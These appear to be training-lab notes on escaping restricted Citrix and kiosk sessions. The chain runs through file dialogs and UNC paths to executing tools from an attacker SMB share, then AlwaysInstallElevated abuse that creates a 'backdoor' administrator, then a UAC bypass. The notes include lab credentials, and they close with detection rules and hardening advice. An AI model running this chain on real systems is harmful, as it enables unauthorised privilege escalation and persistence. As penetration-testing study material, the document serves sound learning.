Citrix Breakout involves escaping restricted virtualization environments such as Terminal Services, Citrix, AWS AppStream, CyberArk PSM, and Kiosk environments. These platforms implement lock-down measures to minimize security impact, but breakout techniques can bypass these restrictions to gain command execution and privilege escalation.
1. Gain access to a Dialog Box
2. Exploit the Dialog Box to achieve command execution
3. Escalate privileges to gain higher levels of access

# Highly restrictive environments typically have:
- No cmd.exe/powershell.exe in Start Menu
- Blocked access to C:\Windows\system32 via File Explorer
- Group policy restrictions on directory browsing
- File Explorer access restrictions to sensitive paths

# Applications with file interaction features provide dialog boxes:
- Save/Save As
- Open/Load
- Browse/Import/Export
- Help/Search/Scan/Print

# Steps (dialog box breakout via Paint):
1. Run Paint from Start Menu
2. Click File > Open to open Dialog Box
3. Enter UNC path: \\127.0.0.1\c$\users\pmorgan
4. Set File-Type to "All Files"
5. Press Enter to gain directory access
# Result: Bypasses File Explorer restrictions

# UNC paths that work in dialog boxes:
\\127.0.0.1\c$\users\<username> # Local admin share
\\<ip>\<share> # Remote SMB share
\\localhost\c$\ # Alternative localhost syntax

# On attacking machine (Ubuntu/Kali):
smbserver.py -smb2support share $(pwd)
# Example output:
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0

# Steps (execute tools from the SMB share):
1. Open Paint > File > Open
2. Enter UNC path: \\<attacker_ip>\share
3. Set File-Type to "All Files"
4. Browse and execute files directly from share
# File execution:
- Right-click on executable
- Select "Open" to run directly

// pwn.c - Simple CMD launcher
#include <stdlib.h>

int main(void) {
    // Launch an interactive command prompt from the restricted session
    system("C:\\Windows\\System32\\cmd.exe");
    return 0;
}
// Compile and place on SMB share
// Right-click > Open in dialog box = CMD access

# Why Explorer++:
- Portable (no installation required)
- Bypasses group policy folder restrictions
- Fast and user-friendly interface
- Can copy files where File Explorer cannot
# Usage:
1. Download Explorer++ to SMB share
2. Execute via dialog box or copy to system
3. Use for unrestricted file system access

# Recommended tools:
- Explorer++ # Most popular and effective
- Q-Dir # Quad-pane file manager
- FreeCommander # Dual-pane alternative
- Total Commander # Feature-rich option

# When regedit.exe is blocked by group policy:
- Simpleregedit
- Uberregedit
- SmallRegistryEditor
# These GUI tools bypass standard group policy restrictions
# Allow full registry editing capabilities

# Capabilities:
- Full HKEY hive access
- Import/Export registry files
- Search functionality
- Permissions modification

# Steps (shortcut target modification):
1. Right-click existing shortcut
2. Select "Properties"
3. Modify "Target" field to desired executable:
Target: C:\Windows\System32\cmd.exe
4. Execute shortcut = CMD access
# Alternative targets:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\mmc.exe
\\<ip>\share\<tool>.exe

# PowerShell method for .lnk creation:
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("C:\Users\<user>\Desktop\pwn.lnk")
$Shortcut.TargetPath = "C:\Windows\System32\cmd.exe"
$Shortcut.Save()

# Create evil.bat:
1. Create new text file
2. Rename to "evil.bat"
3. Edit content:
cmd
4. Save and execute
# Result: Opens Command Prompt

# When these extensions auto-execute:
.bat # Batch files
.vbs # VBScript files
.ps1 # PowerShell scripts
# Potential for:
- Interactive console access
- Download and launch tools
- Bypass restrictions via scripting

# Check registry for Always Install Elevated:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Both must return REG_DWORD 0x1; the policy only takes effect when it is set in both hives

# Using PowerUp for MSI creation:
Import-Module .\PowerUp.ps1
Write-UserAddMSI
# Creates UserAdd.msi on desktop
# Execute to create new admin user

# MSI execution creates user dialog:
Username: backdoor
Password: T3st@123 # Must meet complexity requirements
Group: Administrators
# Result: New admin user created

# Switch to new admin user:
runas /user:backdoor cmd
# Enter password: T3st@123
# New CMD session as admin user

# Even admin users face UAC restrictions:
C:\Windows\system32> cd C:\Users\Administrator
Access is denied.
# UAC blocks access despite admin membership

# UAC bypass execution:
Import-Module .\Bypass-UAC.ps1
Bypass-UAC -Method UacMethodSysprep
# Process:
- Impersonates explorer.exe
- Drops proxy DLL
- Executes sysprep for privilege escalation

# Verify elevated privileges:
whoami /all
whoami /priv
# Test access:
cd C:\Users\Administrator
dir *.txt

# Lab access method:
1. RDP to target with htb-student:HTB_@cademy_stdnt!
2. Visit http://humongousretail.com/remote/
3. Login: pmorgan:Summer1Summer! (Domain: htb.local)
4. Download launch.ica file for Citrix access

# Objective: Get flag from C:\Users\pmorgan\Downloads
# Method: Dialog box bypass to access restricted directory
# Steps:
1. Open Paint > File > Open
2. Navigate to: \\127.0.0.1\c$\users\pmorgan\Downloads
3. Access flag.txt
# Flag location: C:\Users\pmorgan\Downloads\flag.txt

# Objective: Get flag from C:\Users\Administrator\Desktop
# Method: Full privilege escalation chain
# Complete process:
1. Dialog box breakout for CMD access
2. Copy tools from SMB share
3. Use PowerUp for AlwaysInstallElevated
4. Create admin user with MSI
5. UAC bypass with Bypass-UAC.ps1
6. Access Administrator desktop
# Flag location: C:\Users\Administrator\Desktop\flag.txt

# Full chain summary:
# 1. Initial access via dialog box
Paint > File > Open > \\127.0.0.1\c$\users\<user>
# 2. SMB server setup
smbserver.py -smb2support share $(pwd)
# 3. Tool transfer and execution
\\<attacker_ip>\share\pwn.exe
# 4. Privilege enumeration
.\PowerUp.ps1
# or
.\winPEAS.exe
# 5. AlwaysInstallElevated exploitation
Write-UserAddMSI
# Execute UserAdd.msi
# 6. Admin user creation
Username: backdoor
Password: Complex@123
Group: Administrators
# 7. Context switch
runas /user:backdoor cmd
# 8. UAC bypass
Bypass-UAC -Method UacMethodSysprep
# 9. Full system access
whoami /priv
cd C:\Users\Administrator

# Tool reference
# File system access:
Explorer++.exe # Alternative file manager
Q-Dir.exe # Quad-pane explorer
# Registry access:
SmallRegistryEditor.exe # Alternative registry editor
Simpleregedit.exe # Lightweight reg editor
# Privilege escalation:
PowerUp.ps1 # Privilege escalation framework
Bypass-UAC.ps1 # UAC bypass collection
winPEAS.exe # Windows enumeration
# Custom tools:
pwn.exe # Custom CMD launcher
evil.bat # Simple batch breakout

# Monitor for:
- Unusual dialog box usage patterns
- UNC path access in file dialogs
- Alternative file manager execution
- Registry editor process spawning
- MSI installation outside normal channels
- UAC bypass script execution
- SMB connections to external shares

# Hardening recommendations:
- Block UNC path access in dialog boxes
- Disable Always Install Elevated policy
- Implement application allowlisting
- Monitor file manager alternatives
- Restrict SMB access to external hosts
- Enforce a stricter UAC configuration
- Restrict registry access, including alternative registry editors
- Apply policies governing dialog box behavior

# Key takeaways:
- Dialog boxes provide powerful bypass mechanisms for restricted environments
- UNC paths can circumvent File Explorer restrictions
- Alternative tools (Explorer++, registry editors) bypass group policy
- SMB shares enable tool transfer and execution in restricted environments
- MSI exploitation with AlwaysInstallElevated provides reliable privilege escalation
- UAC bypass is often necessary even with admin users
- Script execution (.bat, .vbs, .ps1) can provide multiple breakout vectors
Citrix breakout techniques exploit the inherent trust in application dialog boxes and file interaction features to escape restricted virtualization environments and achieve privilege escalation.
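As an added defensive example (my code, not part of the original notes), the monitoring indicators and the AlwaysInstallElevated check from the notes above, expressed as rules run over constructed Sysmon-style process-creation events and `reg query` text; the process-name sets, regexes and sample events are assumptions made here for illustration, not platform telemetry or a vendor's rule set.

```python
"""Detection and audit helpers for the breakout indicators in these notes."""
import re

DIALOG_HOSTS = {"mspaint.exe", "notepad.exe", "wordpad.exe"}   # dialog-box entry apps
SHELLS = {"cmd.exe", "powershell.exe"}
ALT_TOOLS = {"explorer++.exe", "q-dir.exe", "freecommander.exe", "totalcmd.exe",
             "simpleregedit.exe", "uberregedit.exe", "smallregistryeditor.exe"}
UNC_RE = re.compile(r"^\\\\[\w.-]+\\")                # image launched from an SMB share
USER_MSI_RE = re.compile(r"c:\\users\\[^\\]+\\.*\.msi\b", re.I)  # MSI under a profile

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(event):
    """Return the names of the monitoring rules that fire on one event."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmdline = event.get("CommandLine", "")
    hits = []
    if parent in DIALOG_HOSTS and image in SHELLS:
        hits.append("shell_spawned_from_dialog_app")      # Paint > Open > cmd.exe
    if image in ALT_TOOLS:
        hits.append("alternative_file_or_registry_tool")  # Explorer++, Simpleregedit...
    if UNC_RE.match(event["Image"]):
        hits.append("binary_run_from_unc_share")          # \\attacker\share\tool.exe
    if image == "msiexec.exe" and USER_MSI_RE.search(cmdline):
        hits.append("msi_installed_from_user_profile")    # UserAdd.msi on the desktop
    if image == "sysprep.exe" and parent in SHELLS:
        hits.append("sysprep_spawned_by_shell")           # UacMethodSysprep pattern
    return hits

def always_install_elevated(hkcu_output, hklm_output):
    """Audit: True only when BOTH hives set the value to 0x1 (inert otherwise)."""
    pat = re.compile(r"AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-f]+)", re.I)
    found = [pat.search(out) for out in (hkcu_output, hklm_output)]
    return all(m is not None and int(m.group(1), 16) == 1 for m in found)

# Constructed sample events, not real telemetry.
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\mspaint.exe"},
    {"Image": r"\\10.10.14.5\share\Explorer++.exe", "ParentImage": r"C:\Windows\System32\mspaint.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec /i "C:\Users\pmorgan\Desktop\UserAdd.msi"'},
    {"Image": r"C:\Windows\System32\Sysprep\sysprep.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(basename(e["Image"]), "->", detect(e) or "clean")
```

The audit helper consumes the text printed by the two `reg query` commands shown earlier and only reports the policy as active when both hives agree, which is also why clearing either hive is sufficient remediation.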